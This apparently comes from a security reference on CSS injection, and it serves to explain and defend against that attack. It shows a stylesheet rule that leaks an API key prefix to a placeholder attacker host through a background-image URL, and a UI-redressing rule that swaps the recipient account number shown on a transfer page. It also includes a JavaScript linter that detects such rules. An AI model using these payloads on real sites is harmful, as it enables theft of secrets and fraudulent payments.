CSS Injection

Data Exfiltration

Sensitive values that appear in the page's markup, such as an attribute value, can be exfiltrated: a selector that matches only when the value starts with a given prefix loads a background image from an attacker-controlled server, so the request itself reveals that the prefix matched.

  • API key stealing

    ```css
    input[name='api_key'][value^='secret_value_'] {
        background-image: url('https://[ATTACKER-DOMAIN]/?leak=secret_value_');
    }
    ```
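
As an added defensive example (not code from this page), a small JavaScript linter for user-supplied stylesheets that flags the exfiltration pattern above: an attribute-value selector whose declarations fetch a URL from an origin other than the page's own or an allowlisted CDN. The page origin, the allowlist, the placeholder host `attacker.example` and the sample stylesheet are all constructed for the example.

```javascript
// Added defensive example, not code from the original page: flags CSS rules that
// combine an attribute-value selector (the part that tests a secret) with a
// declaration fetching an external URL (the part that reports the match).
const PAGE_ORIGIN = 'https://app.example';                    // assumed page origin
const ALLOWED_ORIGINS = new Set(['https://cdn.example.com']); // assumed allowlist

// Attribute selectors that compare a value: [name='x'], [value^='a'], [value$='a'], [value*='a'].
const ATTR_VALUE_SELECTOR = /\[\s*[\w-]+\s*[\^$*~|]?=[^\]]*\]/;
// url(...) tokens inside declarations; capture group 2 is the target.
const URL_TOKEN = /url\(\s*(['"]?)([^'")]+)\1\s*\)/gi;

// Minimal splitter for flat style rules. Nested blocks such as @media lose their
// wrapper but their inner rules are still examined; use a real CSS parser in production.
function splitRules(cssText) {
  const rules = [];
  const re = /([^{}]+)\{([^{}]*)\}/g;
  let m;
  while ((m = re.exec(cssText)) !== null) {
    rules.push({ selector: m[1].trim(), body: m[2].trim() });
  }
  return rules;
}

// Resolve as the browser would; null (unparsable) is treated as suspicious.
function urlOrigin(raw) {
  try { return new URL(raw, PAGE_ORIGIN).origin; } catch { return null; }
}

// Returns one finding per external fetch triggered by an attribute-value selector.
function findCssExfiltration(cssText, allowedOrigins = ALLOWED_ORIGINS) {
  const findings = [];
  for (const { selector, body } of splitRules(cssText)) {
    if (!ATTR_VALUE_SELECTOR.test(selector)) continue;
    for (const m of body.matchAll(URL_TOKEN)) {
      const origin = urlOrigin(m[2]);
      if (origin === PAGE_ORIGIN || allowedOrigins.has(origin)) continue;
      findings.push({ selector, url: m[2], origin });
    }
  }
  return findings;
}

// Constructed sample: the page's exfiltration rule with a placeholder host, plus two benign rules.
const SAMPLE_CSS = `
input[name='api_key'][value^='secret_value_'] {
    background-image: url('https://attacker.example/?leak=secret_value_');
}
.btn { background-image: url('/img/btn.png'); }
a[href^='https://']::after { content: url('https://cdn.example.com/ext.svg'); }
`;
```

A `style-src` policy without `'unsafe-inline'` stops injected `<style>` elements and `style` attributes, but not injection into a stylesheet the page already trusts, which is the case this check is meant for.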

UI Redressing (Phishing)

The user interface can be visually altered to mislead users or steal their credentials.

  • Phishing

    ```html
    ...
    <div class="transfer-details">
        <p>Recipient Account Number:</p>
        <span id="account-number">123-456-7890</span>
    </div>
    ...
    ```

    ```css
    /* CSS injected by an attacker */
    #account-number {
        font-size: 0;
    }

    #account-number::after {
        content: "098-765-4321"; /* Attacker's account number */
        font-size: 1rem;
    }
    ```